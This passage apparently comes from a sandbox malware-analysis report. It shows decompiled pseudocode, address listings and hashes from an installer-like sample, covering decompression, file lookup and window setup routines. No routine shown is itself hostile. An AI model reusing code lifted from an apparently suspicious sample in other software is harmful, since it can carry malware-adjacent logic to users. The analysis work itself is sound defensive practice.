								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                          0x00000000
                          0x00406333
                          0x00406333
                          0x00406338
                          0x004063af
                          0x004063b6
                          0x004063c0
                          0x0040699f
                          0x0040699f
                          0x004069a2
                          0x004069a2
                          0x004069a8
                          0x004069ae
                          0x004069b4
                          0x004069ce
                          0x004069d1
                          0x004069d7
                          0x004069e2
                          0x004069e4
                          0x004069b6
                          0x004069b6
                          0x004069c5
                          0x004069c9
                          0x004069c9
                          0x004069ee
                          0x00406a15
                          0x00406a15
                          0x00406a1b
                          0x00406a1b
                          0x00000000
                          0x004069f0
                          0x004069f0
                          0x004069f4
                          0x00406ba3
                          0x00000000
                          0x00406ba3
                          0x00406a00
                          0x00406a07
                          0x00406a0f
                          0x00406a12
                          0x00000000
                          0x00406a12
                          0x0040633a
                          0x0040633a
                          0x0040633e
                          0x00406346
                          0x00406349
                          0x0040634b
                          0x0040634e
                          0x00406350
                          0x00406355
                          0x00406358
                          0x0040635f
                          0x00406366
                          0x00406369
                          0x00406374
                          0x0040637c
                          0x0040637c
                          0x00406376
                          0x00406376
                          0x00406376
                          0x0040636b
                          0x0040636b
                          0x0040636b
                          0x00406383
                          0x004063a1
                          0x004063a3
                          0x00406576
                          0x00406576
                          0x00406579
                          0x0040657c
                          0x0040657f
                          0x00406582
                          0x00406585
                          0x00406588
                          0x0040658b
                          0x0040658e
                          0x00406594
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b5
                          0x004065b8
                          0x004065be
                          0x00406596
                          0x00406596
                          0x0040659e
                          0x004065a3
                          0x004065a5
                          0x004065a7
                          0x004065a7
                          0x004065c8
                          0x004065cb
                          0x0040656e
                          0x00406574
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004065cd
                          0x00406549
                          0x0040654d
                          0x00406b55
                          0x00000000
                          0x00406b55
                          0x00406553
                          0x00406556
                          0x00406559
                          0x0040655d
                          0x00406560
                          0x00406566
                          0x00406568
                          0x00406568
                          0x0040656b
                          0x00000000
                          0x0040656b
                          0x00406385
                          0x00406385
                          0x00406388
                          0x0040638e
                          0x00406390
                          0x00406390
                          0x00406393
                          0x00406396
                          0x00406398
                          0x00406399
                          0x0040639c
                          0x00406409
                          0x00406409
                          0x0040640d
                          0x00406410
                          0x00406413
                          0x00406416
                          0x00406419
                          0x0040641a
                          0x0040641d
                          0x0040641f
                          0x00406425
                          0x00406428
                          0x0040642b
                          0x0040642e
                          0x00406431
                          0x00406437
                          0x00406453
                          0x00406456
                          0x00406459
                          0x0040645c
                          0x00406463
                          0x00406469
                          0x0040646d
                          0x00406439
                          0x00406439
                          0x0040643d
                          0x00406445
                          0x0040644a
                          0x0040644c
                          0x0040644e
                          0x0040644e
                          0x00406477
                          0x0040647a
                          0x004063f1
                          0x004063f1
                          0x004063f7
                          0x004064aa
                          0x004064b0
                          0x00000000
                          0x00000000
                          0x004064b2
                          0x004064b5
                          0x004064b8
                          0x004064bb
                          0x004064be
                          0x004064c1
                          0x004064c4
                          0x004064c7
                          0x004064ca
                          0x004064d0
                          0x004064e8
                          0x004064eb
                          0x004064ee
                          0x004064f1
                          0x004064f1
                          0x004064f4
                          0x004064fa
                          0x004064d2
                          0x004064d2
                          0x004064da
                          0x004064df
                          0x004064e1
                          0x004064e3
                          0x004064e3
                          0x00406504
                          0x00406507
                          0x00406485
                          0x00406489
                          0x00406b49
                          0x00000000
                          0x00406b49
                          0x0040648f
                          0x00406492
                          0x00406495
                          0x00406499
                          0x0040649c
                          0x004064a2
                          0x004064a4
                          0x004064a4
                          0x004064a7
                          0x004064a7
                          0x00406507
                          0x0040650e
                          0x0040650e
                          0x0040650e
                          0x00406512
                          0x00406512
                          0x00406515
                          0x00406518
                          0x0040651c
                          0x00406b61
                          0x00000000
                          0x00406b61
                          0x00406522
                          0x00406525
                          0x00406528
                          0x0040652b
                          0x0040652e
                          0x00406531
                          0x00406534
                          0x00406536
                          0x00406539
                          0x0040653c
                          0x0040653f
                          0x00406541
                          0x00406541
                          0x00406541
                          0x004066de
                          0x004066de
                          0x004066e1
                          0x004066e1
                          0x00000000
                          0x004066e1
                          0x00406403
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406480
                          0x004063cc
                          0x004063d0
                          0x00406b3d
                          0x00406bb9
                          0x00406bc1
                          0x00406bc8
                          0x00406bca
                          0x00406bd1
                          0x00406bd5
                          0x00406bd5
                          0x004063d6
                          0x004063d9
                          0x004063dc
                          0x004063e0
                          0x004063e3
                          0x004063e9
                          0x004063eb
                          0x004063eb
                          0x004063ee
                          0x00000000
                          0x004063ee
                          0x0040647a
                          0x00406383
                          0x004061b7
                          0x004061b7
                          0x004061c0
                          0x00406bce
                          0x00406bce
                          0x00000000
                          0x00406bce
                          0x004061c6
                          0x00000000
                          0x004061d1
                          0x00000000
                          0x00000000
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e4
                          0x00000000
                          0x00000000
                          0x004061ea
                          0x004061ed
                          0x004061ef
                          0x004061f0
                          0x004061f3
                          0x004061f5
                          0x004061f6
                          0x004061f8
                          0x004061fb
                          0x00406200
                          0x00406205
                          0x0040620e
                          0x00406221
                          0x00406224
                          0x00406230
                          0x00406258
                          0x0040625a
                          0x00406268
                          0x00406268
                          0x0040626c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040625c
                          0x0040625c
                          0x0040625f
                          0x00406260
                          0x00406260
                          0x00000000
                          0x0040625c
                          0x00406236
                          0x0040623b
                          0x0040623b
                          0x00406244
                          0x0040624c
                          0x0040624f
                          0x00000000
                          0x00406255
                          0x00406255
                          0x00000000
                          0x00406255
                          0x00000000
                          0x00406272
                          0x00406272
                          0x00406276
                          0x00406b22
                          0x00000000
                          0x00406b22
                          0x0040627f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406295
                          0x00406295
                          0x00406298
                          0x0040629c
                          0x00000000
                          0x00000000
                          0x0040629e
                          0x004062a4
                          0x004062ce
                          0x004062d4
                          0x004062db
                          0x00000000
                          0x004062db
                          0x004062aa
                          0x004062ad
                          0x004062b2
                          0x004062b2
                          0x004062bd
                          0x004062c5
                          0x004062c8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040630d
                          0x00406313
                          0x00406316
                          0x00406323
                          0x0040632b
                          0x00000000
                          0x00000000
                          0x004062e2
                          0x004062e2
                          0x004062e6
                          0x00406b31
                          0x00000000
                          0x00406b31
                          0x004062f2
                          0x004062fd
                          0x004062fd
                          0x004062fd
                          0x00406300
                          0x00406303
                          0x00406306
                          0x0040630b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004065d2
                          0x004065d6
                          0x004065f4
                          0x004065f7
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x00406607
                          0x0040660a
                          0x0040660d
                          0x0040660f
                          0x00406616
                          0x00406617
                          0x00406619
                          0x0040661c
                          0x0040661f
                          0x00406622
                          0x00406622
                          0x00406627
                          0x00000000
                          0x00406627
                          0x004065d8
                          0x004065db
                          0x004065de
                          0x004065e8
                          0x00000000
                          0x00000000
                          0x0040663c
                          0x00406640
                          0x00406663
                          0x00406666
                          0x00406669
                          0x00406673
                          0x00406642
                          0x00406642
                          0x00406645
                          0x00406648
                          0x0040664b
                          0x00406658
                          0x0040665b
                          0x0040665b
                          0x00000000
                          0x00000000
                          0x0040667f
                          0x00406683
                          0x00000000
                          0x00000000
                          0x00406689
                          0x0040668d
                          0x00000000
                          0x00000000
                          0x00406693
                          0x00406695
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x004066a0
                          0x00000000
                          0x00000000
                          0x004066f0
                          0x004066f4
                          0x004066fb
                          0x004066fe
                          0x00406701
                          0x0040670b
                          0x00000000
                          0x0040670b
                          0x004066f6
                          0x00000000
                          0x00000000
                          0x00406717
                          0x0040671b
                          0x00406722
                          0x00406725
                          0x00406728
                          0x0040671d
                          0x0040671d
                          0x0040671d
                          0x0040672b
                          0x0040672e
                          0x00406731
                          0x00406731
                          0x00406734
                          0x00406737
                          0x0040673a
                          0x0040673a
                          0x0040673d
                          0x00406744
                          0x00406749
                          0x00000000
                          0x00000000
                          0x004067d7
                          0x004067d7
                          0x004067db
                          0x00406b79
                          0x00000000
                          0x00406b79
                          0x004067e1
                          0x004067e4
                          0x004067e7
                          0x004067eb
                          0x004067ee
                          0x004067f4
                          0x004067f6
                          0x004067f6
                          0x004067f6
                          0x004067f9
                          0x004067fc
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040685a
                          0x0040685a
                          0x0040685e
                          0x00406b85
                          0x00000000
                          0x00406b85
                          0x00406864
                          0x00406867
                          0x0040686a
                          0x0040686e
                          0x00406871
                          0x00406877
                          0x00406879
                          0x00406879
                          0x00406879
                          0x0040687c
                          0x00000000
                          0x00000000
                          0x0040662a
                          0x0040662a
                          0x0040662d
                          0x00000000
                          0x00000000
                          0x00406969
                          0x0040696d
                          0x0040698f
                          0x00406992
                          0x0040699c
                          0x00000000
                          0x0040699c
                          0x0040696f
                          0x00406972
                          0x00406976
                          0x00406979
                          0x00406979
                          0x0040697c
                          0x00000000
                          0x00000000
                          0x00406a26
                          0x00406a2a
                          0x00406a48
                          0x00406a48
                          0x00406a48
                          0x00406a4f
                          0x00406a56
                          0x00406a5d
                          0x00406a5d
                          0x00000000
                          0x00406a5d
                          0x00406a2c
                          0x00406a2f
                          0x00406a32
                          0x00406a35
                          0x00406a3c
                          0x00406980
                          0x00406980
                          0x00406983
                          0x00000000
                          0x00000000
                          0x00406b17
                          0x00406b1a
                          0x00000000
                          0x00000000
                          0x00406751
                          0x00406753
                          0x0040675a
                          0x0040675b
                          0x0040675d
                          0x00406760
                          0x00000000
                          0x00000000
                          0x00406768
                          0x0040676b
                          0x0040676e
                          0x00406770
                          0x00406772
                          0x00406772
                          0x00406773
                          0x00406776
                          0x0040677d
                          0x00406780
                          0x0040678e
                          0x00000000
                          0x00000000
                          0x00406a64
                          0x00406a64
                          0x00406a67
                          0x00406a6e
                          0x00000000
                          0x00000000
                          0x00406a73
                          0x00406a73
                          0x00406a77
                          0x00406baf
                          0x00000000
                          0x00406baf
                          0x00406a7d
                          0x00406a80
                          0x00406a83
                          0x00406a87
                          0x00406a8a
                          0x00406a90
                          0x00406a92
                          0x00406a92
                          0x00406a92
                          0x00406a95
                          0x00406a98
                          0x00406a98
                          0x00406a98
                          0x00406a98
                          0x00406a9b
                          0x00406a9b
                          0x00406a9f
                          0x00406aff
                          0x00406b02
                          0x00406b07
                          0x00406b08
                          0x00406b0a
                          0x00406b0c
                          0x00406b0f
                          0x00000000
                          0x00406b0f
                          0x00406aa1
                          0x00406aa7
                          0x00406aaa
                          0x00406aad
                          0x00406ab0
                          0x00406ab3
                          0x00406ab6
                          0x00406ab9
                          0x00406abc
                          0x00406abf
                          0x00406ac2
                          0x00406adb
                          0x00406ade
                          0x00406ae1
                          0x00406ae4
                          0x00406ae8
                          0x00406aea
                          0x00406aea
                          0x00406aeb
                          0x00406aee
                          0x00406ac4
                          0x00406ac4
                          0x00406acc
                          0x00406ad1
                          0x00406ad3
                          0x00406ad6
                          0x00406ad6
                          0x00406af1
                          0x00406af8
                          0x00000000
                          0x00406afa
                          0x00000000
                          0x00406afa
                          0x00000000
                          0x00406796
                          0x00406799
                          0x004067cf
                          0x004068ff
                          0x004068ff
                          0x004068ff
                          0x004068ff
                          0x00406902
                          0x00406902
                          0x00406905
                          0x00406907
                          0x00406b91
                          0x00000000
                          0x00406b91
                          0x0040690d
                          0x00406910
                          0x00000000
                          0x00000000
                          0x00406916
                          0x0040691a
                          0x0040691d
                          0x0040691d
                          0x0040691d
                          0x00000000
                          0x0040691d
                          0x0040679b
                          0x0040679d
                          0x0040679f
                          0x004067a1
                          0x004067a4
                          0x004067a5
                          0x004067a7
                          0x004067a9
                          0x004067ac
                          0x004067af
                          0x004067c5
                          0x004067ca
                          0x00406802
                          0x00406802
                          0x00406806
                          0x00406832
                          0x00406834
                          0x0040683b
                          0x0040683e
                          0x00406841
                          0x00406841
                          0x00406846
                          0x00406846
                          0x00406848
                          0x0040684b
                          0x00406852
                          0x00406855
                          0x00406882
                          0x00406882
                          0x00406885
                          0x00406888
                          0x004068fc
                          0x004068fc
                          0x004068fc
                          0x00000000
                          0x004068fc
                          0x0040688a
                          0x00406890
                          0x00406893
                          0x00406896
                          0x00406899
                          0x0040689c
                          0x0040689f
                          0x004068a2
                          0x004068a5
                          0x004068a8
                          0x004068ab
                          0x004068c4
                          0x004068c6
                          0x004068c9
                          0x004068ca
                          0x004068cd
                          0x004068cf
                          0x004068d2
                          0x004068d4
                          0x004068d6
                          0x004068d9
                          0x004068db
                          0x004068de
                          0x004068e2
                          0x004068e4
                          0x004068e4
                          0x004068e5
                          0x004068e8
                          0x004068eb
                          0x004068ad
                          0x004068ad
                          0x004068b5
                          0x004068ba
                          0x004068bc
                          0x004068bf
                          0x004068bf
                          0x004068ee
                          0x004068f5
                          0x0040687f
                          0x0040687f
                          0x0040687f
                          0x0040687f
                          0x00000000
                          0x004068f7
                          0x00000000
                          0x004068f7
                          0x004068f5
                          0x00406808
                          0x0040680b
                          0x0040680d
                          0x00406810
                          0x00406813
                          0x00406816
                          0x00406818
                          0x0040681b
                          0x0040681e
                          0x0040681e
                          0x00406821
                          0x00406821
                          0x00406824
                          0x0040682b
                          0x004067ff
                          0x004067ff
                          0x004067ff
                          0x004067ff
                          0x00000000
                          0x0040682d
                          0x00000000
                          0x0040682d
                          0x0040682b
                          0x004067b1
                          0x004067b4
                          0x004067b6
                          0x004067b9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066a3
                          0x004066a3
                          0x004066a7
                          0x00406b6d
                          0x00000000
                          0x00406b6d
                          0x004066ad
                          0x004066b0
                          0x004066b3
                          0x004066b6
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066be
                          0x004066c1
                          0x004066c4
                          0x004066c7
                          0x004066ca
                          0x004066cb
                          0x004066cd
                          0x004066cd
                          0x004066cd
                          0x004066d0
                          0x004066d3
                          0x004066d6
                          0x004066d9
                          0x004066d9
                          0x004066d9
                          0x004066dc
                          0x00000000
                          0x00000000
                          0x00406920
                          0x00406920
                          0x00406920
                          0x00406924
                          0x00000000
                          0x00000000
                          0x0040692a
                          0x0040692d
                          0x00406930
                          0x00406933
                          0x00406935
                          0x00406935
                          0x00406935
                          0x00406938
                          0x0040693b
                          0x0040693e
                          0x00406941
                          0x00406944
                          0x00406947
                          0x00406948
                          0x0040694a
                          0x0040694a
                          0x0040694a
                          0x0040694d
                          0x00406950
                          0x00406953
                          0x00406956
                          0x00406959
                          0x0040695d
                          0x0040695f
                          0x00406962
                          0x00000000
                          0x00406964
                          0x00000000
                          0x00406964
                          0x00406962
                          0x00406b97
                          0x00000000
                          0x00000000
                          0x004061c6

                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9df4b00e3dfa736f107e28386e2211fee1d6be591f2ba6f0ce01288237ab4b61
                          • Instruction ID: bdeebfab4b2853dd6ba105009d9d55a4887b03880c8adf7539db3398297304ab
                          • Opcode Fuzzy Hash: 9df4b00e3dfa736f107e28386e2211fee1d6be591f2ba6f0ce01288237ab4b61
                          • Instruction Fuzzy Hash: 61F16871D00229CBCF28CFA8C8946ADBBB1FF45305F25816ED856BB281D7785A96CF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00405FF6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 627 405ff6-40600a FindFirstFileA 628 406017 627->628 629 40600c-406015 FindClose 627->629 630 406019-40601a 628->630 629->630
                          C-Code - Quality: 100%
                          			E00405FF6(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4225d0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4225d0;
			}




                          0x00406001
                          0x0040600a
                          0x00000000
                          0x00406017
                          0x0040600d
                          0x00000000

                          APIs
                          • FindFirstFileA.KERNELBASE(?,004225D0,C:\,00405912,C:\,C:\,00000000,C:\,C:\,?,?,7476F560,00405634,?,C:\Users\user\AppData\Local\Temp\,7476F560), ref: 00406001
                          • FindClose.KERNEL32(00000000), ref: 0040600D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID: C:\
                          • API String ID: 2295610775-3404278061
                          • Opcode ID: af11e85da2dc783dbe13656bd5508f9fb20cf1c530974d89e4c44af9708dc560
                          • Instruction ID: bebaf1ec17e03c7be3b4f7568d9df3fae16269376aceebcceaf96dbad000be3e
                          • Opcode Fuzzy Hash: af11e85da2dc783dbe13656bd5508f9fb20cf1c530974d89e4c44af9708dc560
                          • Instruction Fuzzy Hash: 20D012719480206BC3105B387D0C85B7A589F89330711CA33F566FA2E0D7749CB2AAED
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040374E Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 134 40374e-403766 call 406087 137 403768-403778 call 405c59 134->137 138 40377a-4037a1 call 405be2 134->138 147 4037c4-4037ed call 403a17 call 4058cf 137->147 143 4037a3-4037b4 call 405be2 138->143 144 4037b9-4037bf lstrcatA 138->144 143->144 144->147 152 4037f3-4037f8 147->152 153 403874-40387c call 4058cf 147->153 152->153 154 4037fa-40381e call 405be2 152->154 159 40388a-4038af LoadImageA 153->159 160 40387e-403885 call 405d1d 153->160 154->153 161 403820-403822 154->161 163 4038b5-4038eb RegisterClassA 159->163 164 40393e-403946 call 40140b 159->164 160->159 165 403833-40383f lstrlenA 161->165 166 403824-403831 call 405819 161->166 167 4038f1-403939 SystemParametersInfoA CreateWindowExA 163->167 168 403a0d 163->168 177 403950-40395b call 403a17 164->177 178 403948-40394b 164->178 172 403841-40384f lstrcmpiA 165->172 173 403867-40386f call 4057ee call 405cfb 165->173 166->165 167->164 171 403a0f-403a16 168->171 172->173 176 403851-40385b GetFileAttributesA 172->176 173->153 180 403861-403862 call 405835 176->180 181 40385d-40385f 176->181 187 403961-40397b ShowWindow call 40601d 177->187 188 4039e4-4039ec call 4050b9 177->188 178->171 180->173 181->173 181->180 193 403987-403999 GetClassInfoA 187->193 194 40397d-403982 call 40601d 187->194 195 403a06-403a08 call 40140b 188->195 196 4039ee-4039f4 188->196 200 4039b1-4039e2 DialogBoxParamA call 40140b call 40369e 193->200 201 40399b-4039ab GetClassInfoA RegisterClassA 193->201 194->193 195->168 196->178 197 4039fa-403a01 call 40140b 196->197 197->178 200->171 201->200
                          C-Code - Quality: 96%
                          			E0040374E(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				signed int _t24;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				intOrPtr _t39;
				int _t42;
				intOrPtr _t60;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				struct HINSTANCE__* _t76;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t85;

				_t81 =  *0x423f90; // 0x5bf9f8
				_t20 = E00406087(3);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x420580;
					"1033" = 0x7830;
					E00405BE2(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420580, 0);
					__eflags =  *0x420580;
					if(__eflags == 0) {
						E00405BE2(0x80000003, ".DEFAULT\\Control Panel\\International",  &M004072F6, 0x420580, 0);
					}
					lstrcatA("1033", _t79);
				} else {
					E00405C59("1033",  *_t20() & 0x0000ffff);
				}
				E00403A17(_t76, _t88);
				_t24 =  *0x423f98; // 0x80
				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x424000 = _t24 & 0x00000020;
				 *0x42401c = 0x10000;
				if(E004058CF(_t88, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E004058CF(_t96, _t84) == 0) {
						E00405D1D(0, _t79, _t81, _t84,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x423f80, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x423768 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403A17(_t76, __eflags);
							__eflags =  *0x424020;
							if( *0x424020 != 0) {
								_t31 = E004050B9(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42374c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420558, 5);
							_t37 = E0040601D("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								E0040601D("RichEd32");
							}
							_t85 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t85, 0x423720);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x423720);
								 *0x423744 = _t85;
								RegisterClassA(0x423720);
							}
							_t39 =  *0x423760; // 0x0
							_t42 = DialogBoxParamA( *0x423f80, _t39 + 0x00000069 & 0x0000ffff, 0, E00403AE4, 0);
							E0040369E(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x423f80; // 0x400000
						 *0x423734 = _t28;
						_v20 = 0x624e5f;
						 *0x423724 = E00401000;
						 *0x423730 = _t76;
						 *0x423744 =  &_v20;
						if(RegisterClassA(0x423720) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x420558 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423f80, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t60 =  *0x423fb8; // 0x5c11e0
					_t79 = 0x422f20;
					E00405BE2( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) + _t60, 0x422f20, 0);
					_t62 =  *0x422f20; // 0x22
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x422f21;
						 *((char*)(E00405819(0x422f21, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E00405CFB(_t84, E004057EE(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E00405835(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}





























                          0x00403754
                          0x0040375d
                          0x00403764
                          0x00403766
                          0x0040377a
                          0x0040378c
                          0x00403796
                          0x0040379b
                          0x004037a1
                          0x004037b4
                          0x004037b4
                          0x004037bf
                          0x00403768
                          0x00403773
                          0x00403773
                          0x004037c4
                          0x004037c9
                          0x004037ce
                          0x004037d7
                          0x004037dc
                          0x004037ed
                          0x00403874
                          0x0040387c
                          0x00403885
                          0x00403885
                          0x0040389b
                          0x004038a1
                          0x004038af
                          0x0040393e
                          0x00403946
                          0x00403950
                          0x00403955
                          0x0040395b
                          0x004039e5
                          0x004039ea
                          0x004039ec
                          0x00403a08
                          0x00000000
                          0x00403a08
                          0x004039ee
                          0x004039f4
                          0x004039fc
                          0x004039fc
                          0x00000000
                          0x004039f4
                          0x00403969
                          0x00403974
                          0x00403979
                          0x0040397b
                          0x00403982
                          0x00403982
                          0x0040398d
                          0x00403995
                          0x00403997
                          0x00403999
                          0x004039a2
                          0x004039a5
                          0x004039ab
                          0x004039ab
                          0x004039b1
                          0x004039ca
                          0x004039db
                          0x00000000
                          0x004039e0
                          0x00403948
                          0x0040394a
                          0x00000000
                          0x004038b5
                          0x004038b5
                          0x004038bb
                          0x004038c5
                          0x004038cd
